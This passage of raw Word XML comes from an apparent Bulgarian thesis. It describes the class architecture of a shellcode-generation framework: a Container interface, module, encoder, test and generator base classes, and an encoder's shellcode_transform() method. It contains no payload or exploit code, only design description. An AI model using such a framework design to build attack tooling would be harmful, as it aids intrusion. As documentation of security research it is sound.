          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|validate_*()    |      |                |      |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F5FC6" w:rsidRPr="001E0963" w:rsidRDefault="005F5FC6" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F5FC6" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Класова диаграма на модулите</w:t>
      </w:r>
      <w:r w:rsidR="005F56EB">
        <w:rPr>
          <w:highlight w:val="magenta"/>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="005F56EB" w:rsidRPr="00112660">
        <w:t>. Затова класът Container дефинира основен интерфейс, който обединява функционалностите им, като инициализация и валидация на параметри и финално форматиране на сорс кода. Така се намаля дублирането на код.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Този интерфейс може да се използва по 2 начина: статичен и с инстанция на обект. Статичният начин покрива необходимостта на представяне на потребителя какъв код има всеки модул и се основава на метода </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>inspect()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">. Това трябва да е възможно без изискване на параметри, за да може да си проличи какви стойности могат да бъдат параметризирани. Инстанцирането на класа започва събирането на параметри. Техните имена и стойности по подразбиране се получават от метода param_template(). За всеки един от тях се търси </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>валидиращ метод, който да гарантира, че изпълнението на програмата няма да доведе до грешки по-нататък. Животът на обекта приключва с методите build_data() и build_code(), които форматират параметрите в статичната информация и кода. Container има 3 наследника:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_m912envb0s0g" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="143" w:name="_Ref2190843"/>
      <w:bookmarkEnd w:id="142"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |   Container    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |get_data()      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |get_code()      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |build_data()    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |build_code()    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |param_template()|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |inspect()       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       ^        ^       ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                       |        |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         +-------------+        |       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                      |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                      |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|   BaseModule   |      |  BaseEncoder   |      |    BaseTest    |       | BaseGenerator  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+       +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|__reprp__()     |      |build()         |      |build()         |       |append_module() |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      |prepare_build() |      +----------------+       |build()         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         ^              +----------------+               ^               |clear()         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       ^                       |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        ^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |                        |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +---------------------+          |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|   ArchModule   |      |     ArchEncoder     |          |               |   Generator    |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +---------------------+          |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|                |      |build()              |          |               |build()         |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      |shellcode_transform()|          |               +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         ^              +---------------------+          |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       ^                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">         |                       |                       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|     Module     |      |    Encoder     |      |      Test      |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>|validate_*()    |      |                |      |                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006150B9" w:rsidRPr="001E0963" w:rsidRDefault="006150B9" w:rsidP="006150B9">
      <w:pPr>
        <w:pStyle w:val="figures"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>+----------------+      +----------------+      +----------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00C61194">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>: Класова диаграма на модулите</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="008227E1">
        <w:t>BaseModule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Този клас е основата за всеки шелкод модул. Той дефинира само метод за кратко извеждане на състоянието на обектите му.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_e7kx6k8k72bp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="144"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>BaseGenerator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Този базов клас няма общо с другите, но е важна част за функционирането на шелкод модулите. Той дефинира методи за добавяне на модули и изчистването му (</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>append_module()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>clear()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">). По-важният метод е </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>build()</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>който трябва да бъде предефиниран за реализация на спецификите на всяка архитектура.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_8z3tybfa4bs1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>BaseEncoder</w:t>
